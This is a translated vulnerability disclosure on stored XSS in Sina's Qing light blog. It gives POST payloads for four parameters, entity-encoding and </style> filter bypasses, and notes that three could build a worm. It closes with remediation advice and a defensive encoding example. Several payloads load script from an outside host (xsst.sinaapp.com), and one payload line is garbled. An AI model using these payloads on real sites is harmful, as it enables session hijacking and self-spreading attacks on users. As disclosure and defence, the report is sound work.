Sina light blog XSS retest


Last night I re-tested the functions of Qing (Sina's light blog).
 
Of the blog, photo, music and video functions, three can lead to stored XSS, which can be used to build a worm.
 
In addition, the [template settings] can also lead to stored XSS, which could keep users hijacked for a long time.
In general, after the previous bug was submitted, the light blog started filtering double quotation marks.
 
However, the light blog front-end does not output content directly; it outputs it through .innerHTML = '...content...'.
 
In this case,
 
.innerHTML = ' ';
 
and
 
.innerHTML = ' ';
 
are equivalent.
 
The developer filters only the double quotation mark itself, not its HTML-entity form, which leads to the following three XSS.
 
 
1. Blog post XSS. The cover parameter is not filtered.
 
http://qing.weibo.com/blog/api/artpost.php
 
POST (only the defective parameter is given; the other parameters can use their defaults)
cover http://ww3.sinaimg.cn/mw600/a7ff28"80jw1dtlhke6xkjj.jpg/onerror="Utils.Io.JsLoad.request(&#x27;//xsst.sinaapp.com/m.js&#x27;)
 
 
The above loads an external JS file.
 
--------------------------------------------
 
2. Video publishing XSS. The swf parameter is not filtered.
 
http://qing.weibo.com/blog/api/videopost.php
 
POST (only the defective parameter is given; the other parameters can use their defaults)
swf
Dependencies> <. swf
 
 
The above loads an external swf.
 
--------------------------------------------
 
3. Music publishing XSS. The url parameter is not filtered.
 
The screen parameter of the music function was already reported on WooYun by someone else (http://www.wooyun.org/bugs/wooyun-2010-03926).
 
So I did not test that parameter; I tested the other parameters directly and found that the url parameter is not filtered.
 
http://qing.weibo.com/blog/api/musicpost.php
POST (only the defective parameter is given; the other parameters can use their defaults)
url http://t.cn/zODGJj8'&quot;onload=&quot;Utils.Io.JsLoad.request(&#x27;//xsst.sinaapp.com/m.js&#x27;)&quot; a=&quot;
 
 
Screenshot:

--------------------------------------------
 
4. XSS in the template settings.
 
This one is a bit more interesting. Set the template to the [diary] template!
 
Capture the request and you get the following content.
 
css_data image:Upload background image:http%3A//background|color:Background color:%23fff|color:text color:%23333|color:text link color:%23542B10
 
 
You can see that the POST data contains a background image address. Now view the page source: the background address is output in the following position:
 
<style type="text/css">
body {background: #cfcfcf url(http://simg.sinajs.cn/xblogtheme/images/1/1_5/body.png) repeat; color: #333333;}
 
....
</style>
 
 
Can we modify this background address?
 
Testing showed that the address cannot contain ", <, > or similar characters; the system prompts "incorrect image address".
 
However, if &quot; is used instead, no prompt appears, but the double quotation mark is still filtered out.
 
However, if &#x61; is entered, it is converted to a in the output;
 
From the above we can infer the following backend logic:
 
Logic 4-1
 
a. Convert HTML entities such as &quot; and &nbsp; to their original characters.
b. Filter out double quotation marks, single quotation marks, spaces and other special characters from the result.
c. Check whether special characters remain; if so, return an error. However, & is not treated as a special character here.
 
 
At first I just wanted to use CSS expression(), but that method only works in IE6, 7 and 8, which is not much fun.. So I continued testing to see whether a </style> could be entered to close the CSS and insert my own HTML code.
 
a. Testing found that < and > are filtered.
b. Even using &#x3C; &#x3E; returns an error!
c. However, when I used </style> directly to close the CSS, I accidentally found that </style> was filtered out silently, with no prompt, rather than the error that < and > produce. This indicates that the </style> replacement takes priority over the < and > check.
d. Based on c, I came up with the &#x<style>3C; method. This bypasses the first step of logic 4-1: once <style> is replaced, &#x3C; is left. At first I guessed the output would be &#x3C;, but the result was <.. It seems there are still some steps in the logic, but that is not what I care about. Now that < can be output, we can build the following and try to output </style>:
 
&#x<style>3C;/style&#x<style>3E;
 
 
e. Result... still a tragedy: it is filtered to empty again. So it must be a loop check. However, since it is there to filter </style>, it does not necessarily filter the form </style[whitespace]>; because spaces are filtered out, the whitespace here is a tab (0x09). So we get the following form.
 
&#x<style>3C;/style&#x<style>09;&#x<style>3E;
 
 
f. This time </style> is output successfully, and the CSS is closed.
 
g. Based on the above steps, we can construct the complete img code.
 
http%3A//a.com/)&#x<style>3C;/style&#x<style>09;&#x<style>3E;&#x<style>3C;img/src&#x<style>3D;1&#x<style>09;onerror&#x<style>3D;Utils.io.jsLoad.request(/&#x<style>5C;/&#x<style>5C;/xsst.sinaapp.com&#x<style>5C;/m.js/.source)&#x<style>3E;
 
 
h. The above is only test code. Because the style is located before all the loaded JS, we cannot use Sina's Utils library. The final POST data is constructed as follows:
 
http://qing.weibo.com/blog/api/mytplpost.php
POSTDATA (only the defective parameter is listed)
 
css_data
 
image:Upload background image:http%3A//a.com/)&#x<style>3C;/style&#x<style>09;&#x<style>3E;&#x<style>3C;img/src&#x<style>3D;1&#x<style>09;onerror&#x<style>3D;(function()&#x<style>7B;window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116);window.s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);window.s.src=String.fromCharCode(104,116,116,112,47,120,115,115,116,46,115,105,110,112,112,111,109,47,109,46,106,115,);document.body.appendChild(window.s);&#x<style>7D;)()&#x<style>3e0000a.png|color:Background color:%23fff|color:text color:%23333|color:text Link color:%23542B10
 
 
i. After submission, view the output in Chrome.
 
 
 


 
j. For the effect, see the vulnerability proof.
Proof of vulnerability:
1. The first three can be used to build a worm.
 
2. The last one, with the code refined, keeps the victim user hijacked for as long as that user's template remains in effect.
 
3. This is already long; I will not take a screenshot of each one.
 
 
Solution:
1. The first three problems are the same: when innerHTML is used for output, replace & with &amp;.
 
2. The last one.. the filtering logic is too complicated. Even if a custom background is offered, keep the image address under your own domain, for example http://www.sinaimg.cn/userid/xxxxx.jpg; then only the xxxxx part needs to be filtered.
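The following is an added example, not code from the report or from Sina. It models in plain JavaScript the two fixes proposed above (encode & before an innerHTML or attribute sink; accept only a file name for the template background and build the URL on a fixed path) and the check-ordering point behind logic 4-1 (decode to a fixed point first, then check once). decodeCharRefs is a small stand-in for the browser's character-reference decoding, the image host and path layout are assumptions taken from the report's own example, and all sample inputs are constructed.

```javascript
// Added example, not code from the original report or from Sina. It models the
// two fixes from the Solution section and the check-ordering point of logic 4-1:
//   1. innerHTML / attribute sink: encode '&' (and the delimiters) so a character
//      the server stripped cannot come back as a character reference;
//   2. template background: accept only a file name, never a URL, and build the
//      address on a fixed path (host and path layout below are assumptions);
//   3. if a free-form value must be checked, canonicalize it first and check once.

// Stand-in for the browser's character-reference decoding of an attribute value
// (an event-handler attribute included). Numeric forms plus the few named ones
// used in the report; a real parser knows many more names.
const NAMED = { quot: '"', amp: '&', lt: '<', gt: '>', apos: "'" };

function decodeCharRefs(s) {
  return s.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);/g, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1] === 'x' || body[1] === 'X';
      const cp = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return cp >= 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const named = NAMED[body.toLowerCase()];
    return named === undefined ? match : named;
  });
}

// The filter the report describes: only the literal double quote is removed.
function weakFilter(s) {
  return s.replace(/"/g, '');
}

// Fix 1: output encoding for an HTML text or attribute context. '&' is encoded
// first so that references already present in the input are neutralised too.
function escapeForHtml(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Fix 2: the user chooses only the file-name part (the "xxxxx.jpg" of the
// report's example); the server composes the URL. Host and layout are assumed.
const IMAGE_HOST = 'http://www.sinaimg.cn';
const FILE_NAME = /^[A-Za-z0-9_-]{1,64}\.(?:png|jpe?g|gif)$/;

function backgroundUrl(userId, fileName) {
  if (!/^[0-9]{1,20}$/.test(String(userId))) return null;
  if (!FILE_NAME.test(fileName)) return null; // excludes & < > quotes / and whitespace
  return IMAGE_HOST + '/' + userId + '/' + fileName;
}

// Emits the body rule from the report's stylesheet. backgroundUrl() only ever
// returns allow-listed characters, so nothing needs escaping; a rejected name
// falls back to the default theme image instead of breaking the stylesheet.
function bodyRule(userId, fileName, fallbackUrl) {
  const url = backgroundUrl(userId, fileName) || fallbackUrl;
  return 'body {background: #cfcfcf url(' + url + ') repeat; color: #333333;}';
}

// Point 3: logic 4-1 decoded, then filtered, then checked, and kept rewriting
// the value (the </style> replacement) after the check. Decode to a fixed point
// first, check once, and do not transform the value afterwards. '&' and
// whitespace are part of the reject set here.
function rejectsAfterCanonicalizing(s) {
  let prev;
  let cur = s;
  for (let i = 0; i < 8 && cur !== prev; i++) {
    prev = cur;
    cur = decodeCharRefs(cur);
  }
  return /[&<>"'\s]/.test(cur);
}
```

Run it with node. A value that passes weakFilter, such as a&quot;, decodes to a" once it reaches the attribute, whereas escapeForHtml turns it into a&quot;&amp;quot; and the decoded value is exactly the original input again, so no character the server removed can be reintroduced. backgroundUrl returns null for anything outside the file-name allow-list (entities, path separators, whitespace), which is why the stylesheet emitter needs no escaping of its own.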

Author: gainover
